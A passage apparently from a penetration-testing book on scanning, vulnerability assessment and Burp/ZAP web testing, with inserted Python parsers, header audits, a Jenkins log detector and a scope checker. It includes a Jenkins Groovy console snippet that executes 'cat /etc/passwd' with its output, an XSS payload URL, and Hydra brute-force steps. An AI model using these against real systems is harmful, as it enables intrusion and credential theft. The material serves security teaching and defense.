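        ipaddress.ip_address(ip)          # raises on a garbled address
        hosts[ip].add((proto, int(port)))
    return dict(hosts)


def port_histogram(hosts):
    """How many hosts expose each TCP port; the quickest view of what a range runs."""
    return Counter(port for ports in hosts.values() for proto, port in ports if proto == "tcp")


def web_targets(hosts):
    """'ip:port' strings for open TCP ports that are likely HTTP(S), sorted by IP then port."""
    targets = [(ipaddress.ip_address(ip), port)
               for ip, ports in hosts.items()
               for proto, port in ports
               if proto == "tcp" and port in WEB_PORTS]
    return [f"{ip}:{port}" for ip, port in sorted(targets)]


if __name__ == "__main__":
    hosts = parse_masscan_list(SAMPLE_MASSCAN_LIST)
    for ip in sorted(hosts, key=ipaddress.ip_address):
        print(ip, sorted(port for _, port in hosts[ip]))
    print("ports by host count:", port_histogram(hosts).most_common())
    print("web targets:", web_targets(hosts))
```

Point the parser at the real output.txt and the web_targets list is exactly what a screenshot tool wants as input; the histogram is a fast sanity check that the scan covered what you expected before spending time on individual hosts.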


Sparta 

(http://sparta.secforce.com/) (Kali Linux) 



Throughout this book, I really try to push the ideas of efficiency and effectiveness. Scanning really 
large networks works great with Masscan, but for smaller or internal networks, we can use a tool like 
SPARTA. 


“SPARTA is a python GUI application which simplifies network infrastructure penetration testing by 
aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by 
having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If 
little time is spent setting up commands and tools, more time can be spent focusing on analysing 
results.” {3} 


The reason I have found SPARTA to be valuable as part of my toolkit is that it runs Nmap in a 
staged process. SPARTA will start an initial scan of limited ports, start Nikto for any web ports, and 
perform screen captures. After the stage 1 scan finishes, it will start a much deeper stage 2 and stage 
3 Nmap scan. 

Once services are identified, you can easily manually check Nikto, MySQL default credentials, and 
plug directly into the Hydra password brute-force tool all via the GUI interface. 


To start up SPARTA: 

• cd /opt/sparta/ 

• ./sparta.py 

SPARTA is really simple and straightforward to use. Once you load up the GUI console, click to add 
hosts and start scanning. SPARTA takes advantage of the nmap detection to start using its auxiliary 
modules. 



SPARTA - Nikto Scan 


In the Nikto tab, we can see the results from the Nikto scan. 

















- Nikto v2.1.6 

+ Target IP: 10.239.151.23 
+ Target Hostname: 10.239.151.23 
+ Target Port: 80 
+ Start Time: 2015-02-16 15:49:07 (GMT-5) 

+ Server: Apache/2.4.7 (Ubuntu) 
+ Cookie PHPSESSID created without the httponly flag 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5 
+ The anti-clickjacking X-Frame-Options header is not present. 
+ Root page / redirects to: dashboard/ 
+ No CGI Directories found (use '-C all' to force check all possible dirs) 

SPARTA - Nikto Results 
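Every finding in the Nikto output above (a session cookie without HttpOnly, a version-disclosing X-Powered-By header, no anti-clickjacking header) is visible in the raw response headers alone. Here is an added example, written for this edit rather than taken from the book or from SPARTA/Nikto, that audits a response for exactly those weaknesses. Both responses are constructed: the first mirrors the headers Nikto reported, the second is the same response after hardening.

```python
from email.parser import Parser

# Constructed raw response modelled on the Nikto output above: Apache/2.4.7,
# a version-disclosing X-Powered-By, PHPSESSID set without HttpOnly, and no
# anti-clickjacking header. The cookie value is made up.
WEAK_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.4.7 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.5.9-1ubuntu4.5\r\n"
    "Set-Cookie: PHPSESSID=c0nstructedvalue; path=/\r\n"
    "Location: dashboard/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# The same response after hardening (constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=c0nstructedvalue; path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Location: dashboard/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, header Message)."""
    status_line, _, rest = raw.partition("\r\n")
    header_block = rest.partition("\r\n\r\n")[0]
    # The RFC 822 header parser is case-insensitive and keeps repeated headers
    # such as multiple Set-Cookie lines, which dict-based parsing would lose.
    headers = Parser().parsestr(header_block, headersonly=True)
    return status_line, headers


def cookie_attrs(set_cookie_value):
    """Return the cookie name and the lower-cased set of its attribute names."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit_headers(raw):
    """List weaknesses visible from the headers alone (empty list means clean)."""
    _, headers = parse_response(raw)
    findings = []
    for cookie in headers.get_all("Set-Cookie") or []:
        name, attrs = cookie_attrs(cookie)
        if "httponly" not in attrs:
            findings.append(f"cookie {name} created without the HttpOnly flag")
        if "secure" not in attrs:
            findings.append(f"cookie {name} created without the Secure flag")
    csp = headers.get("Content-Security-Policy") or ""
    if headers.get("X-Frame-Options") is None and "frame-ancestors" not in csp:
        findings.append("no X-Frame-Options or CSP frame-ancestors (clickjacking)")
    if (headers.get("X-Content-Type-Options") or "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff not set")
    for name in ("Server", "X-Powered-By"):
        value = headers.get(name)
        if value and any(ch.isdigit() for ch in value):
            findings.append(f"{name} header discloses a version: {value}")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}: {audit_headers(raw) or ['no findings']}")
```

The check is deliberately header-only so it can run against a saved response from Burp's history or a curl -i capture without touching the target again, which is useful when confirming that a fix landed.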


SPARTA will also use cutycapt to take screenshots of the web pages. 
SPARTA - Screenshot 


What makes SPARTA so quick is that you can right-click on any host and send it to Hydra. In this 
case, we identify a host with SSH running on HTTPS (443). We can right-click on that host and “Send 
to Brute”. 
SPARTA - Brute-force 


Clicking on the Brute tab, you can supply either a single username/password combo or credentials 
from password lists. 
SPARTA - Brute 


It also has additional functionality for MySQL to check default credentials. 
SPARTA - MySQL Check 


While you might use Masscan on large external ranges to do initial discovery, SPARTA is a valuable 
tool to enrich your scans. 


Http Screenshot 

(https://github.com/breenmachine/httpscreenshot) (Kali Linux) 


One of the most efficient and effective starting points on a penetration test is understanding what 
systems and services are available. Although there are plenty of network/service level exploits, I 
have found most initial entry points into an organization, especially from the outside, to be via web 
applications, because systems have default passwords, simple misconfigurations, or many known 
web application flaws. 


After the reconnaissance phase, you have identified that the Secure Universal Cyber Kittens company 
has a CIDR /20 range on their externally-facing environment. That comes out to 65536 different IPs 
that we need to scan and start analyzing. Sure, we kick off our vulnerability scanner in the 
background, but we need to start attacking, as time is limited. Since there is no way we could visit 
each and every one of those web pages, we need to automate this process and be able to utilize the 
resulting data in an efficient manner. 


This is where we combine both Masscan and HTTP Screenshot to scan the network and take 
screenshots of the webpages. This way, we can visually look at web pages instead of visiting them 
one by one. Before starting the scan, we need to configure a few settings: 

• cd /opt/httpscreenshot 

• edit masshttp.sh to make sure it points to the right masscan executable and make sure 
that httpscreenshot.py points to the correct location. 

o instead of /root/masscan/bin/masscan, it should be /opt/masscan/bin/masscan 

o instead of ~/tools/httpscreenshot.py, it should be /opt/httpscreenshot/httpscreenshot.py 

• change the ports to be scanned from 80,443 to 
80,443,8000,8001,8080,8443,8008,9200,50070 [add your favorite web ports here] 

• create a file called networks.txt to put in the network CIDR range you want to scan 

o gedit networks.txt 


Let’s kick off a scan: 

• ./masshttp.sh 

• firefox ./clusters.html 


With the speed of Masscan and the power of HTTP Screenshot, we have a list of websites with the 
host images. There are a lot of benefits to HTTP Screenshot, such as resolving certificate hostnames 
for virtual/shared hosting and threading, but the biggest benefit is how it correlates similar web pages 
together. You might have a ton of HTTP basic auth pages or printers, and HTTP Screenshot will 
group them together. It makes attacking and reporting much easier. I will say that the output 
isn’t the prettiest, but the functionality is what works. 


So what are we looking for in web application screenshots? The things that should pop out are: 

• JBoss 

• Coldfusion 

• Jenkins 

• Authentication Pages 

• Content Management Pages (WordPress, Joomla) 

• VoIP Pages 

• Networking Devices 

• Printers 

• Tomcat 

• Beta/Dev Sites 

• Indexed Pages 

• Test sites 

• Zencart 

• IP-Cameras 

• SCADA 

• Outdated Copyright 


Why? Because we want shells! A great place to walk through to get a better understanding of 
vulnerable web applications is to review the exploits themselves. Let’s stop and take a quick look at: 

http://www.exploit-db.com/webapps/ . 


From our scan of SUCK, we see normal services like printers (which we will get into a little later), 
but one thing I now often see on pentests is a couple of Jenkins hosts. This quickly stands out to me 
and, as stated before, one of the benefits of HTTP Screenshot is that it puts all the Jenkins servers 
together. Jenkins is a web application that provides continuous integration services for software 
development. Regardless of what it really does, it has some features that can give us our first point 
into our network. 


HTTP Screenshot 


Unauthenticated Jenkins servers are known to have a flaw that allows remote code execution using 
Groovy Script. Pentestgeek.com did a great article on how to take advantage of this vulnerability, by 
visiting the Jenkins box over port 8080 and traversing to /script/script: 

• http://[IP]:8080/script/script 


Here, we are presented with a script console, where we can execute arbitrary Groovy Script 
code{4}: 

• def sout = new StringBuffer(), serr = new StringBuffer() 

• def proc = '[Code to Execute Here]'.execute() 

• proc.consumeProcessOutput(sout, serr) 

• proc.waitForOrKill(1000) 

• println "out> $sout err> $serr" 

This works on both Windows and *nix systems, so just make sure you first find out what system you 
are attacking. In the example below, we will run a quick “cat /etc/passwd” to make sure that we have 
code execution. 



Jenkins - Script Console 

def sout = new StringBuffer(), serr = new StringBuffer() 
def proc = 'cat /etc/passwd'.execute() 
proc.consumeProcessOutput(sout, serr) 
proc.waitForOrKill(1000) 
println "out> $sout err> $serr" 

Result 

out> root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
... 

Jenkins Vulnerable Server 


As you can see in the results, we were able to execute our payload and read its output. We won’t dive much 
deeper in this section, but this provides a good example of how HTTP Screenshot can be beneficial. 
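From the defender's side, the console access shown above leaves a trace: requests to the Jenkins /script endpoint (the page the book visits, also reachable as /script/script) or to /scriptText, the plain-text variant of the same console. Here is an added detection example, written for this edit and not taken from the book or from Jenkins, that runs over constructed access-log lines in the common combined format as a reverse proxy in front of Jenkins would write them. The assumption is that the proxy records the authenticated user in the third field, with '-' for anonymous requests.

```python
import re
from collections import Counter

# Combined log format, e.g. from an nginx/Apache reverse proxy in front of Jenkins.
# Assumption: the third field holds the authenticated user, '-' when anonymous.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines; addresses, users and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Feb/2015:15:49:07 -0500] "GET /login HTTP/1.1" 200 1234
10.0.0.5 - - [16/Feb/2015:15:49:20 -0500] "GET /script HTTP/1.1" 200 8820
10.0.0.5 - - [16/Feb/2015:15:49:41 -0500] "POST /script HTTP/1.1" 200 9102
10.0.0.9 - admin [16/Feb/2015:16:02:11 -0500] "GET /script HTTP/1.1" 200 8820
10.0.0.7 - - [16/Feb/2015:16:10:03 -0500] "POST /scriptText HTTP/1.1" 403 512
10.0.0.5 - - [16/Feb/2015:16:11:00 -0500] "GET /job/build/1/console HTTP/1.1" 200 4000
10.0.0.5 - - [16/Feb/2015:16:12:00 -0500] "GET /static/scripts/app.js HTTP/1.1" 200 77
"""

# Jenkins script console endpoints.
SCRIPT_PATHS = ("/script", "/scriptText")


def is_script_console(path):
    """Match the console endpoints exactly or as a path prefix, ignoring any query string."""
    path = path.split("?", 1)[0]
    return any(path == p or path.startswith(p + "/") for p in SCRIPT_PATHS)


def detect_script_console_access(log_text):
    """Return one event per script-console request, graded by who got what.

    high   - anonymous client and the server answered 2xx: the console is open
    medium - authenticated user answered 2xx: legitimate, but worth auditing
    info   - request refused (401/403/...): the access control worked
    """
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_script_console(m["path"]):
            continue
        status = int(m["status"])
        served = 200 <= status < 300
        if served and m["user"] == "-":
            severity = "high"
        elif served:
            severity = "medium"
        else:
            severity = "info"
        events.append({"src": m["src"], "user": m["user"], "method": m["method"],
                       "path": m["path"], "status": status, "severity": severity})
    return events


def offending_sources(events):
    """Count high-severity events per source address for a quick triage view."""
    return Counter(e["src"] for e in events if e["severity"] == "high")


if __name__ == "__main__":
    events = detect_script_console_access(SAMPLE_LOG)
    for e in events:
        print(f'{e["severity"]:6} {e["src"]:10} {e["user"]:6} {e["method"]} {e["path"]} -> {e["status"]}')
    print("sources with open-console access:", dict(offending_sources(events)))
```

A 2xx to an anonymous client on these paths is the single condition that matters here; a 403 on the same path is evidence that authentication is enforced, which is also the fix for the flaw the book describes.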


One additional thing I want to point out when doing web screenshots is that you will sometimes run 
into issues where one of the tools does not work, or into scenarios where you need more 
information. I always tell my readers to never focus on one tool, and in this case there are two other 
tools to look at: 


Eyewitness - https://www.christophertruncer.com/eyewitness-triage-tool/ ended up really replacing 
Peepingtom, which was talked about in the first book. Eyewitness works great, but I have had 
problems on large scans. These might be fixed by now, but this was just one of the many issues I kept 
running into. 


One other tool that I would look into is an interesting project called WMAP Network Scanning. The 
gap they are trying to solve is that these web scrapers don’t generally handle or render Flash or Java. 
On those special pentests where you have a ton of these types of sites, you could look into this 
Chrome Extension: 

• http://thehackerblog.com/wmap-a-chrome-extension-for-taking-screenshots-of-web-services/ 

• https://chrome.google.com/webstore/detail/wmap/pflahkdjlekaeehbenhpkpipgkbbdbl 

How WMAP works is that it uses Chrome to open a new tab with the IP and takes a picture of the 
page. It takes advantage of the fact that the browser will do all the rendering. 


Configuring WMAP is extremely simple after the installation of the Chrome plugin. 


WMAP Results 


I do have some problems with this tool, mainly with speed and how it opens a tab for each site, but it 
does render things that Peepingtom and Eyewitness cannot since it uses the browser. 


Vulnerability Scanning: 


After performing initial scans and mapping out the network, I usually like to kick off a couple of 
vulnerability scans in the background. I will go over a few tools to help you with vulnerability 
scanning. 


Rapid7 Nexpose/Tenable Nessus 

(Kali/Windows/OS X): 


Two of the most common vulnerability-scanning tools I see are Rapid7 Nexpose and Tenable Nessus. 
Like I said in the last book, there is always a huge war about which one of the scanners is better, and 
again I offer this caveat: I have used most of the commercial scanners and have never found one to be 
perfect or the right solution. When comparing these tools, I have seen that there are always some 
findings that are discovered and missed by certain tools. The best idea would be to run multiple tools, 
but this isn't always the most financially acceptable solution. My quick two cents is that if you are 
going to purchase a single license, I would recommend getting Tenable's Nessus Vulnerability 
Scanner. For the number of IPs you can scan and the cost ($1,500), it is the most reasonable. I have 
found that a single consultant license of NeXpose is double the price and limited on the number of IPs 
you can scan, but I ask that you verify, as you never know when prices might change. In terms of 
performance and ease of use, for large complex networks, I prefer the management interface on 
NeXpose. In terms of finding odd vulnerabilities, Nessus takes the cake on this one. They definitely 
do a lot of research on embedded devices and SCADA (and the like), where I don’t see those types of 
findings on my Rapid7 reports. 


The best option here is to give both of them a trial: 

• Rapid7 NeXpose: http://www.rapid7.com/products/nexpose/compare-downloads.jsp 

• Tenable Nessus: www.tenable.com/products/nessus/evaluate 


Openvas 

(http://www.openvas.org/) (Kali) 

Since I discuss a lot of commercial tools, as I mentioned in previous chapters, I want to be 
able to complement them with open source tools. There is a decent open source vulnerability tool 
that you can also use in your arsenal. Open Vulnerability Assessment System (OpenVAS) is a great 
tool for learning and testing vulnerabilities. Compared to the commercial tools, from my experience, 
OpenVAS does pick up a lot of similar findings, but I have noticed on engagements that it misses 
potentially high findings. I have also noticed that with OpenVAS, I had a lot of trouble when things 
break. When it breaks, it breaks hard and a lot of manual work is needed to get it back up and running. 


The positive side of OpenVAS is that it does do all the things required by a scanner. It can run 
different configurations, do authenticated scans, create reports, and even distribute scans over 
multiple nodes. 


To get OpenVAS up and running, from a command prompt on your Kali host, type: 

• openvas-setup 

• openvas-scapdata-sync 

• openvas-certdata-sync 

• openvas-adduser 

• gsd 

Enter the server address as localhost and the username/password of the account you created during 
the setup phase. 
OpenVAS 


Once you login, you can go right to starting a scan : 

• Tasks ->New 

• Click on the Blue Star on Scan Targets 

• Add your IP ranges and Create the Scan 
It is pretty straightforward to start and kick off a vulnerability scan as your tasks should be pre-populated 
at the bottom pane of Greenbone Security Desktop. Once you see your task, you can right-click 
on that task and click “Start.” 

















































OpenVAS - Starting Scan 


Once the scan completes, you can go over to the report tab or export the report to a PDF format. 



OpenVAS - Results 


This vsftpd vulnerability was the one that we found on the Metasploitable 2 box, which we used to 
exploit with Metasploit in the prior section. 
Summary: 

vsftpd is prone to a backdoor vulnerability. 

Attackers can exploit this issue to execute arbitrary commands in the 
context of the application. Successful attacks will compromise the 
affected application. 

The vsftpd 2.3.4 source package is affected. 

Solution: 

The repaired package can be downloaded from 
https://security.appspot.com/vsftpd.html. Please validate the package 
with its signature. 

OpenVAS - Findings 


Vulnerability scanning is still an important factor in any penetration test, though it definitely is not the 
be-all and end-all for offensive testing. If you look at real-world examples, other than external 
scanning, most attacks do not incorporate a lot of internal scans. This is because they are loud, trigger 
intrusion detection systems, and, at times, take down services. Instead, they focus on moving quietly 
through the network, using the knowledge gained from each step to move laterally, and on 
exfiltrating data. 


Web Application Scanning 


Scanning the SUCK network, we should now have a good idea of what the infrastructure and running 
services look like. We have done our research with OSINT tools, created password lists, and 
run our vulnerability scanner. So what’s next? Most companies these days actually do run 
vulnerability scanners across their networks; I still come across MS08-067, but it is 
becoming much less frequent. If you do come across an infrastructure that generally patches well, 
then web application scanning on a network pentest can be extremely helpful. 


After I start the network scanners and get a layout with the active discovery tools, I begin my web 
application scanners. In web scanning, I am going to mainly focus on one tool. There are a lot of good 
open source/free tools available to use, such as ZAP, WebScarab, Nikto, w3af, etc. In this case, I am 
going for the quickest, most efficient way to perform a test. Although the Burp Suite Pro 
(http://portswigger.net/burp/) is a commercial tool, it only costs around $300. This is well worth the 
cost as it is actively maintained, has a lot of capabilities for manual testing, and many security 
researchers develop extensions for Burp. 

Similar to the discussion of vulnerability scanners, this isn't going to be a comprehensive guide to 
accomplishing web application penetration tests, but more of what is performed during a network 
penetration test. If you want to focus on testing a single application thoroughly, you are going to want 
to look into both source code analysis (using something like HP Fortify) and in-depth application 
testing (a great resource for this is a book called The Web Application Hacker's Handbook: Finding 
and Exploiting Security Flaws). Let's dive into how to efficiently use Burp Suite. 


The Process For Web Scanning 


In this section, I describe how I use Burp Suite Pro to scan web applications during a network 
penetration test. Usually, I won't have enough time during a network pen-test to do a full web 
application test, but these are the steps I take when I identify larger applications: 

• Spider/Discovery/Scanning with Burp Pro 

• Scanning with a web application scanner 

• Manual parameter injection 

• Session token analysis 


Web Application Scanning 


After running a tool like Nessus or Nexpose to find the common system/application/service 
vulnerabilities, it is time to dig into the application. I am going to describe how to use Burp Suite and 
get you to start looking deeper into the application. The steps are to: 

1) Configure Your Network Proxy 

2) Enable Burp Suite 

3) Spider through the application 

4) Discover Content 

5) Run the Active Scanner 

6) Exploit 


Configuring Your Network Proxy and Browser 

Remember that the Burp Suite tool works by configuring your web browser to talk through the Burp 
Suite application and then to the web application(s). This gives you full visibility into the requests 
made by the browser and also the ability to modify the raw requests regardless of client-side 
protections. 


First, you are going to want to start Burp Suite by running the JAR file on either the Windows or Kali 
system. Once you have Burp up and running, you want to make sure your proxy is enabled and 
listening on port 8080. Go to the Proxy tab in Burp, then to Options, and make sure that Burp is 
running. It doesn't matter which interface port you use, however, if you change it from the default, 
make sure to change it in your browser's configuration. 
Enabling Burp Suite 


Now, we need to configure your browser so that it can use the port on which we have Burp Proxy 
listening. The add-on that I use is called FoxyProxy for Firefox 
(https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/), and it should have been 
installed in the setup phase. It provides an easy way to have multiple proxies and be able to change 
between them quickly. Right next to the browser's URL bar, there is a fox with a circle and line across 
it. Click on the fox, click Add New Proxy, click the Proxy Details tab, and set the Manual Proxy 
Configuration to the local host (127.0.0.1) and the proxy port of 8080. Go back to the General tab, 
give that proxy a name, and save that configuration. 

What you have essentially done is told your browser to send all the traffic to your local host to port 
8080. This is the port on which we have configured the Burp Suite application to listen. Burp knows 
that it will take this traffic and proxy it out to the Internet. 
Configuring the Browser’s Proxy Settings 


Since you have saved this profile, right-click on the fox and drop down to select your proxy 
configuration. In this case, I named my proxy configuration Burp Suite and selected that as my proxy. 




Selecting the Proxy to Utilize 


Once we have our browser using the proxy, we can browse to the web application we identified 
earlier. In this example, I am going to go to my site in my browser: www.securepla.net. If we go back 
to Burp, we are going to see the Proxy/Intercept tab light up. 



Burp Capture and Intercepting Traffic 


If we see this happen, we know we have configured everything perfectly. We see that Burp 
successfully captured the GET request for my website and we can also see any cookies and other 
requested information. By default, the initial state is to intercept all traffic. Intercept means to stop 
any requests from the browser to the web application, give you the ability to read or modify that 
request, and either forward that request to the web application or drop that request. 

If you try to browse to any sites with the default setting, you won't be able to see any responses until 
you turn off the "Intercept" button. By turning the "Intercept" button off, we will still be capturing all 
the web traffic, but we won't be directly tampering with every request. Once in an “Intercept-off” 
state, you can see all the requests and responses within the History tab to the right of the Intercept. 


Now, if we go to the Target tab, we can see the URL that we had just trapped and forwarded. Let's 
first add this site to our Scope. Scope defines where automated spidering and testing could occur and 
helps prevent you from actively scanning domains that are out of your scope. We will go into this a 
little bit later, but you should add all the URLs or FQDNs you want to test to your scope. The image 
below shows the tester right-clicking on the domain and clicking on "Add to scope." 
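Scope is worth enforcing outside of Burp as well, since the CIDR ranges fed to Masscan through networks.txt and the FQDNs added to Burp describe the same engagement. Here is an added example, written for this edit and not code from the book or from Burp, that checks URLs and hosts against both kinds of entry. The CIDRs come from the scans earlier in this chapter, www.securepla.net is the author's test site, and .suck.example is a constructed placeholder standing in for the SUCK company's domain.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed scope for the engagement: CIDRs as you would list them in
# networks.txt, plus FQDNs as added to Burp's scope. A leading '.' means
# "this domain and every subdomain". '.suck.example' is a placeholder.
SCOPE = {
    "cidrs": ["23.239.151.0/24", "10.0.0.0/8"],
    "hosts": ["www.securepla.net", ".suck.example"],
}


def compile_scope(scope):
    """Pre-parse the scope: networks, exact hostnames, domain suffixes."""
    nets = [ipaddress.ip_network(c, strict=False) for c in scope["cidrs"]]
    exact = {h.lower() for h in scope["hosts"] if not h.startswith(".")}
    suffixes = [h.lower() for h in scope["hosts"] if h.startswith(".")]
    return nets, exact, suffixes


def host_in_scope(host, scope):
    """True if host (an IP literal or a DNS name) is covered by the scope.

    IP literals are matched only against the CIDR list, never against names,
    so an in-scope name resolving to an out-of-scope address is not silently
    accepted; resolve and check the address separately if that matters.
    """
    nets, exact, suffixes = compile_scope(scope)
    host = host.lower().rstrip(".")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        return any(ip in n for n in nets)
    if host in exact:
        return True
    # '.suck.example' matches 'suck.example' and 'x.suck.example', not 'notsuck.example'
    return any(host == s[1:] or host.endswith(s) for s in suffixes)


def url_in_scope(url, scope):
    """Scope check on a full URL; port and path never affect scope here."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError(f"no host component in {url!r}")
    return host_in_scope(host, scope)


def partition_targets(urls, scope):
    """Split a target list into (in_scope, out_of_scope) before anything is scanned."""
    inside, outside = [], []
    for url in urls:
        (inside if url_in_scope(url, scope) else outside).append(url)
    return inside, outside


if __name__ == "__main__":
    candidates = [
        "http://www.securepla.net/xss_example/example.php?alert=1",
        "https://intranet.suck.example:8443/",
        "http://23.239.151.23/",
        "https://fonts.googleapis.com/css",   # referenced third party, out of scope
        "http://notsuck.example/",
    ]
    inside, outside = partition_targets(candidates, SCOPE)
    print("in scope:", inside)
    print("out of scope:", outside)
```

Run the spidered site map through partition_targets before handing anything to an active scanner; the third-party domains a site references are exactly what the Burp Filter hides, and what this check refuses.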






























Creating Your Scope 


Spider Application 

The first thing to do for web application testing is to spider the host. This means that Burp will crawl 
through the whole website and record all the different files, forms, and HTTP methods on that site. 
We spider first because we need to identify where all the links are, what types of parameters are used 
in the application, what external sites the application references to, and the overall layout of how the 
application functions. 


To spider your application, drop into the Target tab, the Site map tab, right-click the domain on which 
you want to spider, and click "Spider this host." 



Spidering the Host 


Once the spidering process is complete, Burp should have a good layout of what the application looks 
like. We can also click on any file (image below) to see what the request and the response were. In 
the left-hand column, we see all of the files and folders, and on the right-hand side, we see the 
requests and responses. Right below the Site map tab is the Filter button. Try playing around with this 
to see what you are filtering out and what works for you. Generally, I like to first add all my domains 
to scope and then click the Filter to only show those that are in scope. It ends up cleaning up a lot of 
referenced domains, which are out of scope on my tests anyway. 
Site Map/Request and Responses 


Discover Content 

There are times where pages or folders are not directly linked from a web application. For example, I 
have often seen that the admin folder or login page are not referenced anywhere on the site. You might 
see that when you go to the /admin/ folder in your browser bar, you are taken to the admin 
authentication page, but this might have been missed during the spidering phase. This is usually 
because host administrators are trying to hide these folders and administrative login pages from 
general users. These are the exact types of things you are looking for in a test, so that you can try to 
bypass or brute-force the authentication process. 


There is a specific module within Burp that is extremely helpful in these scenarios. Within the same 
Site map tab, you right-click on the parent URL, drop down to "Engagement tools," and click on 
"Discover content." 
Discover Content 


Once inside the Discovery module, you can click on the "Session is not running" button and the 
application will start "smart brute forcing" folders and file structures. When I say, "smart brute 
forcing," I mean the application learns from files and folders it finds within the application and tries 
to make better choices for brute forcing. This technique provides an efficient process to identify 
folders and files to further your application testing. 


Before I show the example, note that there are custom wordlists that I prefer to use during my own 
assessments. One of these lists comes from a tool called RAFT that is no longer developed. 


These lists can be found here: http://code.google.com/p/raft/source/browse/trunk/data/wordlists/?r=64 


Discovering Session Status 


As you can see in the image above, the Discovery tool identified the /wp-includes/ folder which is 
common to WordPress applications. It then starts looking for common folder/files types within that 
folder. You can click on the Site map tab at the top of the Discovery module and see all the results 
from that scan. This will help to quickly identify hidden folders, admin pages, configuration pages, 
and other pages that will prove useful to a tester. 


Running the Active Scanner 

Once you feel comfortable that you have identified an adequate portion of the site, you can start 
attacking the parameters, requests, and start looking for vulnerabilities. This can be done by right- 
clicking on the parent domain and dropping down to "Actively scan this host" (image below). This 
will kick off Burp's application scanner and start fuzzing input parameters. Remember, this is going to 
be extremely loud on the network and may submit extensive queries in the application. A quick 
warning, if the application has a comment box, the customer might receive an excessive amount of 
emails from all the parameters being actively fuzzed. This is why it is always important to let your 
customer know when and from where the tester will be performing these tasks. 
Active Vulnerability Scans 


Once the scanner is running, the results and testing queue will be located in the "Scanner" tab. You 
might want to look at the Options tab within the Scanner tab to further configure Burp Suite. One 
change that I generally make to decrease scan times is to increase the number of threads in the Active 
Scan Engine section. This will make a significant difference in the amount of time that is required, but 
be careful, as you might take down a small site if the thread count is too high. 


If we take a look at the results, we see that Burp Suite found an XSS vulnerability for this website. 
Burp told us exactly what the issue was, the request to repeat it, and the response. 
Scan Results 


Being a penetration tester, you need to verify that you do not have any false positives and identify the 
actual severity of the finding. Let's see if what Burp found was actually valid. Clicking on one of 
the XSS vulnerabilities, we can see the exact GET parameter that was used. To replicate this issue, 
we would have to visit: 

www.securepla.net/xss_example/example.php?alert=9228a<script>alert(1)</script>281717daa8d 


Opening a browser and entering the URL demonstrates that this is not a false positive but a real 
vulnerability: the injected script executes in the page. If you aren't familiar with XSS attacks, I 
would spend some time playing with a deliberately vulnerable web application like WebGoat: 

https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project 

Burp will do a lot more than just check for XSS vulnerabilities. It can identify CSRF issues, bad SSL 
certs, directory traversal vulnerabilities, SQL injections, command injections, and much more. To see 
more uses of Burp, go to the section in this book about The Throw - Web Application Pen testing. 


OWASP Zap Proxy 

(https://code.google.com/p/zaproxy/) (Kali Linux/Windows/OS X) 

The open source equivalent to Burp Suite Pro is the OWASP Zed Attack Proxy, or ZAP. Although 
Burp is a commercial tool, ZAP has many of the same features. From proxying traffic and fuzzing 
requests to spidering and automated scanning, ZAP does it all. On Windows/OS X, you can just 
double-click on the OWASP ZAP executable; on Kali you can run it with owasp-zap. 


We are going to test against one of the vulnerable applications on OWASPBWA (which we installed 
in the setup phase of the book). In this case we will be testing against the owaspbricks application. 
Once you start up ZAP, you will be presented with the screen below. The straightforward attack is to 
just put in the URL http://[IP of VM]/owaspbricks/ and hit Attack. ZAP will automatically run through 
the spidering and test for web vulnerabilities. 


ZAP's start screen: the URL to attack (http://172.16.151.144/owaspbricks/) is entered, Attack is 
clicked, and the Spider and Active Scan tabs fill with the URLs discovered on the target. 

OWASP ZAP 


As you can see, everything is pretty straightforward. Once the scan is finished, click on the Alerts tab 
to see all the vulnerabilities that are identified. 
OWASP ZAP - Results 


Scanning with multiple web application scanners is just as important as scanning with both Nessus 
and Nexpose for network-based vulnerabilities. Here is a side-by-side comparison of scanning the 
same application. As we can see, we found different vulnerabilities, different vulnerability 
locations, and different types of findings between ZAP on the left and Burp on the right. We can 
instantly identify that our scanners produce much different results. 

The one question that I often get is: "Which is better?" The answer is that it always depends. The best 
answer is to use both. They both do a lot of the same things, but each has strengths in specific 
areas. The security community does lean more toward Burp Suite Pro because it supports Burp 
Extender (http://portswigger.net/burp/extender/), which you can use to create customized scan tools. 
You might have an application that does some processing of cookies or that requires a multi-step 
process before fuzzing a certain parameter. This is where Burp excels, and you can read 
more about it here: 

http://blog.opensecurityresearch.com/2014/03/extending-burp.html 


Parsing Nessus, Nmap, Burp 


One of the biggest problems for any tester is that the outputs from many of the different tools can make 
them hard to use. Lee Baird has included a great parsing tool in his Discover toolset. It standardizes 
all the ports, services, findings, and associated information into an easily usable CSV format. 


• cd /opt/discover 

• ./discover.sh 

o 12. Parse XML 
o 2. Nessus (.nessus format) 

